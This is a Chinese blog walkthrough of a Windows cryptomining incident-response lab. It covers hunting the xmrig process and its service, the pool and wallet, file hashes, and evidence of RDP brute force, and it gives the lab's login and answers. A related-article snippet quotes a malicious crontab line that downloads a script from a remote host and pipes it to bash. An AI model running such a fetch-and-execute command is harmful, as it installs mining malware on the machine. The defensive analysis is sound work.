Windows挖矿事件应急响应

最新推荐文章于 2024-08-18 04:23:10 发布
最新推荐文章于 2024-08-18 04:23:10 发布
阅读量447 收藏 4
点赞数 4
分类专栏: 靶场 文章标签: windows 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_48904485/article/details/140350078
版权

一、靶机介绍

Windows挖矿事件

前景需要:机房运维小陈,下班后发现还有工作没完成,然后上机器越用越卡,请你帮他看看原因。

挑战题解:

攻击者的IP地址

攻击者开始攻击的时间

攻击者攻击的端口

挖矿程序的md5

后门脚本的md5

矿池地址

钱包地址

攻击者是如何攻击进入的

相关账户密码

Administrator/zgsf@123

二、解题过程

打开靶机,打开任务管理器,发现cpu被占用接近100%,服务器资源占用严重

在这里插入图片描述

进行排查,发现异常进程

在这里插入图片描述

使用下列方式查询xmrig.exe进程相关信息:

wmic process where caption=”xmrig.exe” get caption,commandline /value

在这里插入图片描述

发现挖矿程序

在这里插入图片描述

上传火绒剑进行分析,发现异常启动项

在这里插入图片描述
在这里插入图片描述

打开异常启动项的脚本分析,发现是下载挖矿程序的恶意脚本

矿池地址:c3pool.org

钱包地址:4APXVhukGNiR5kqqVC7jwiVaa5jDxUgPohEtAyuRS1uyeL6K1LkkBy9SKx5W1M7gYyNneusud6A8hKjJCtVbeoFARuQTu4Y

在这里插入图片描述
在这里插入图片描述

对挖矿程序和后门脚本进行md5加密:

在这里插入图片描述

挖矿程序的md5:6DDDCC42AE5B6DC7477F6181B63E481D

后门脚本的md5:8414900F4C896964497C2CF6552EC4B9

尝试将挖矿进程关闭,发现关闭不了

通过进程ID找到相关联的进程,父进程为2496

在这里插入图片描述

找到进程ID为2496的服务项,发现服务项c3pool_miner存在异常

在这里插入图片描述

选择可疑服务项,右键属性,停止服务,启动类型:禁止。

在这里插入图片描述
在这里插入图片描述

停止服务后,发现靶机CPU资源使用情况恢复正常

在这里插入图片描述

接下来我们分析windows的系统日志,使用APT-Hunter工具的powershell日志收集器自动收集日志信息,将得到的日志解压,分析导出来的结果

APT-Hunter.exe -p C:\Users\Administrator\Desktop\logs\wineventlog -o Project1 -allreport

-p:提供包含使用powershell日志收集器提取的日志的解压路径
-o:输出生成项目的名称

在这里插入图片描述

查看安全日志发现攻击者对靶机进行暴力破解

开始攻击时间:2024-05-21 20:25:22

攻击者IP:192.168.115.131

在这里插入图片描述
在这里插入图片描述

查看靶机端口开放情况,靶机开放了3389端口,可以猜测攻击者通过对3389端口进行暴力破解攻入靶机

在这里插入图片描述

将得到的答案整理,提交(挖矿程序的md5这里不知道为什么答案错误,后门看题解直接复制题解里面的答案提交的:A79D49F425F95E70DDF0C68C18ABC564)

在这里插入图片描述

huang0c
关注
  • 4
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
应急响应Windows应急响应手册(准备阶段、挖矿病毒)
做自己喜欢的事,并将其发挥到极致!
07-16 875
本篇文章主要以WIndows系统为例围绕红蓝对抗和攻防角度实施应急响应的技术手段,以多方面、多维度进行展开,对于常见的应急事件所采取的应对措施进行阐述,希望对从事网安工作的小伙伴们有所帮助!
网络安全自学教程》- 挖矿病毒排查思路和处置步骤
热门推荐
wangyuxiang946的博客
05-05 2万+
首先根据CPU占用率确定确定挖矿进程,找到母体文件并清除。 而后是检查计划任务、启动项中,挖矿木马的持久化操作,杜绝复发。 最后通过账号、日志、母体文件等信息,溯源攻击路径。
【安全】查杀linux上c3pool挖矿病毒xmrig
飞的博客
03-05 1865
病毒来源安装脚本旷池提供的卸载脚本。
应急靶场(2):Windows Server 2022 - Web1
OneMoreThink
07-14 951
目录一、攻击者的shell密码二、攻击者的IP地址三、攻击者的隐藏账户名称四、攻击者挖矿程序的矿池域名(仅域名)五、有实力的可以尝试着修复漏洞下载好靶场(前来挑战!应急响应靶机训练-Web1)并搭建好环境,无需密码直接进入靶机的Administrator帐号。一、攻击者的shell密码在桌面看到phpStudy,右键选择“打开文件所在的位置”,获得phpStudy路径:C:\phpStudy_pr...
应急响应靶场(近源渗透OS-1、挖矿事件
weixin_64815500的博客
06-18 1103
知攻善防公众号应急相应靶场练习之 近源渗透os-1以及挖矿事件的题解随笔
Windows靶机应急响应(一)
流水不争先,争的是滔滔不绝
04-02 2052
Windows靶机应急响应
知攻善防应急响应靶机训练-Web1
tmyzxy1314的博客
05-17 1408
本次应急响应靶机采用的是知攻善防实验室的Web-1应急响应靶机 靶机下载地址为: https://pan.quark.cn/s/4b6dffd0c51a
应急响应练习靶机-web1
最新发布
tddkett的博客
08-18 428
前景需要:小李在值守的过程中,发现有CPU占用飙升,出于胆子小,就立刻将服务器关机,这是他的服务器系统,请你找出以下内容,并作为通关条件:1.攻击者的shell密码2.攻击者的IP地址3.攻击者的隐藏账户名称4.攻击者挖矿程序的矿池域名、用户:administrator 密码:Zgsf@admin.com解题方法不唯一,仅供参考。
一次真实的应急响应案例(Ubuntu)——暴力破解、写入ssh公钥留hou门、植入GPU WK程序——事件复现(靶场下载地址)
03-02
靶场 对应 应急响应教程:https://blog.csdn.net/weixin_40412037/article/details/122963589?spm=1001.2014.3001.5502
忆享科技戟星安全实验室|五分钟学会挖矿病毒的应急响应
m0_61431042的博客
06-17 971
随着虚拟货币的疯狂炒作,挖矿病毒已经成为不法分子利用最为频繁的攻击方式之一。病毒传播者可以利用个人电脑或服务器进行挖矿,具体现象为电脑CPU占用率高。下面介绍一下linux系统和window系统对挖矿木马的应急响应流程。 ...
网络攻防中Windows 应急响应、进程检查、内存分析、特定事件痕迹检查、挖矿病毒应急、勒索病毒事件应急、Sysinternals Utilities、勒索软件文件恢复等等
代码讲故事
04-16 80
网络攻防中Windows 应急响应、进程检查、内存分析、特定事件痕迹检查、挖矿病毒应急、勒索病毒事件应急、Sysinternals Utilities、勒索软件文件恢复等等。
基于手机版本的xmrig执行文件
11-02
基于手机版本的xmrig执行文件
应急响应靶场web1】
一纸荒芜的博客
03-14 3891
本文记录一下自己的靶场解题过程 靶场来源:知攻善防实验室
linux 挖矿病毒解决(syst3md)
xia_2017的博客
08-03 5720
早上来了测试服务器哇哇的响,一猜肯定是有异常病毒了,登陆服务器查看果然有问题。内存直接占了2000多,直接执行kill -9 pid 干掉之后,自己又重新起来了。然后就排查 解决过程 1.先看是否存在异常定时脚本 crontab -l。如果都是非正常定时脚本直接全部姗除。指令为:crontab -r 删除所有定时脚本任务。我这里排查时,没有发现异常定时任务 2.查找病毒进程来源。指令:ls -l /proc/1041/exe 1041为进程PID 通过指令可以发现病毒执行文件...
六、关于阿里云CentOS7被挖矿木马程序入侵的解决办法
玻璃汽水的博客
10-09 4756
查看进程:top c
记一次服务器被利用jenkins挖矿经历-updatejenkins
qq_39126658的博客
11-20 852
图中UpdateJenkins 就是挖矿者创建的任务,应该是Jenkins账号密码太简单了,直接被破解了,登录之后创建了这个任务,会定时(******)执行下面shell脚本。应该是有一些反制手段的,可以刷下这个接口啥的,但不是很会,就没弄了。直接删除掉这个任务就好,然后改jenkins密码,改复杂一点。服务器被利用jenkins启动一个任务,不停跑某个挖矿程序。对方域名:auto.c3pool.org:13333。知道对方ip地址:118.189.172.141。
记录一次腾讯云木马攻击
wenzhenyu1990的专栏
05-24 1019
客户服务运行越来越慢,今天居然挂了,上服务去看free -h 发现服务器内存消耗巨大,top查看果然xmrig以及.libs进程消耗掉了大部分cpu和内存。 直接kill发现还是会继续存在 于是执行crontab -l 发现 30 23 * * * (curl -s http://w.apacheorg.top:1234/xmss||wget -q -O - http://w.apacheorg.top:1234/xmss )|bash -sh 下载 http://w.apacheo...
记录一次centos 6.5被xmrig 攻击的处理过程
zhaofuqiangmycomm的博客
01-31 2633
前言 本次记录仅供小白学习记录,大神略过 上月某一天客户反应系统登录不上 一 top命令查看cpu使用情况 1.1用top命令看cpu 内存占用,果不其然发现了一个异常的xmrig cpu占用74.9%, 难怪系统登录不上 这时不要急着杀死进程,要根据pid找到相关的进程信息 cd /proc/pid 再查看这个文件夹下的内容 1.2找到之后把相关病毒进程和 病毒文件全部删除 二 查看定时任务是否被篡改 crontab -e 果然有病毒的定时启动任务。全部...
服务器病毒,侵占CPU资源
Climber4211的博客
08-20 1249
以下是我从服务器中的病毒里找到的一个文件,从中学到不少知识,现在将这个病毒分析一下,本人只是一个开发,服务器被这个病毒侵占CPU挖矿,没办法,只能研究这个病毒,看怎么让我的服务器访问速度快点。 具体的讲解我也是看到了别人的文章,挂出来 第一篇文章 第二篇感觉讲的很详细 这个病毒最主要的表现是CPU 被占用,自己的服务打开速度奇慢,甚至打不开 #!/bin/bash SHELL=/bin/bash PATH=/sbin:/bin:/usr/sbin:/usr/bin setenforce 0 2>/d
windows挖矿木马
09-08
对于 Windows 系统的挖矿木马,以下是一些常见的问题和解决方案: 1. 如何防止 Windows 系统感染挖矿木马? - 安装有效的杀毒软件,并始终保持其更新。 - 避免从不可信的来源下载和安装软件。 - 及时更新 Windows 操作系统和其他软件补丁。 2. 如何检测和删除挖矿木马? 运行杀毒软件全面扫描系统,确保其能检测并删除挖矿木马。 - 使用安全软件或工具来检测和清除恶意文件和注册表项。 - 对可疑进程和网络连接进行检查,并关闭或删除它们。 3. 如果我怀疑自己的系统被感染了,该怎么办? - 立即运行杀毒软件进行系统扫描。 - 如果杀毒软件无法解决问题,可以尝试使用专门的挖矿木马清除工具。 - 如果问题仍然存在,可以考虑重装操作系统来清除感染。 请注意,这些只是一些基本的建议。如果你遇到了一个真实的威胁,最好咨询专业人士或技术支持来帮助你解决问题。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

huang0c

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值